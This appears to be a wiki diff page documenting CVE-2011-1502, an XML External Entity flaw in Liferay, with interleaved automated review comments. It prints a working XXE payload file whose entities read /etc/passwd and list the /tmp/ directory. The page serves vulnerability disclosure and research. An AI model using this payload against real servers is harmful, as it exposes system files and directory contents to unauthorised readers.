Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05

From version 18.1
edited by Nicolas Gregoire
on 2012/01/13 14:38
Change comment: Upload new attachment liferay-xee.xsl
To version 19.1
edited by Nicolas Gregoire
on 2012/01/13 14:39
Change comment: There is no comment for this version

Details

Page properties
Content
... ... @@ -24,5 +24,11 @@
24 24  
25 25  * CVE-2011-1502 : allows to read UTF-8 files and to list directories via a XEE (XML External Entity) attack
26 26  
27 -Reading /etc/passwd using CVE-2011-1502 :
27 +
28 +
29 +
30 +
31 +Reading /etc/passwd using CVE-2011-1502 (cf attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]) :
32 +
33 +
28 28  [[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]
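Review bot: New lines 27-30 and 32-33 are empty additions that only pad the page around the caption at new line 31; one blank line on each side is enough. The caption names only /etc/passwd, while the bullet on line 25 covers both file reads and directory listing, so state which case the screenshot and the two attachments illustrate, or mention both. Minor style point: write "cf." with a period, and give this version a change comment, since the version that introduces the attachment links has none.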
liferay-xee.xml
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +184 bytes
Content
... ... @@ -1,0 +1,9 @@
1 +<!DOCTYPE doc [
2 +<!ENTITY boom1 SYSTEM "/etc/passwd">
3 +<!ENTITY boom2 SYSTEM "/tmp/">
4 +]>
5 +<doc>
6 +<response><file>&boom1;</file></response>
7 +<response><file>&boom2;</file></response>
8 +</doc>
9 +
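Review bot: The attachment carries no documentation, and the entity names boom1 and boom2 on lines 2-3 do not tell a reader that one targets a file (/etc/passwd) and the other a directory (/tmp/). Add an XML comment at the top naming CVE-2011-1502 and noting that the file is meant to be used with liferay-xee.xsl, and rename the entities to something descriptive. It would also help to note in that comment that a parser configured to refuse DOCTYPE declarations or external entities will not expand these references, so the file doubles as a regression check after patching.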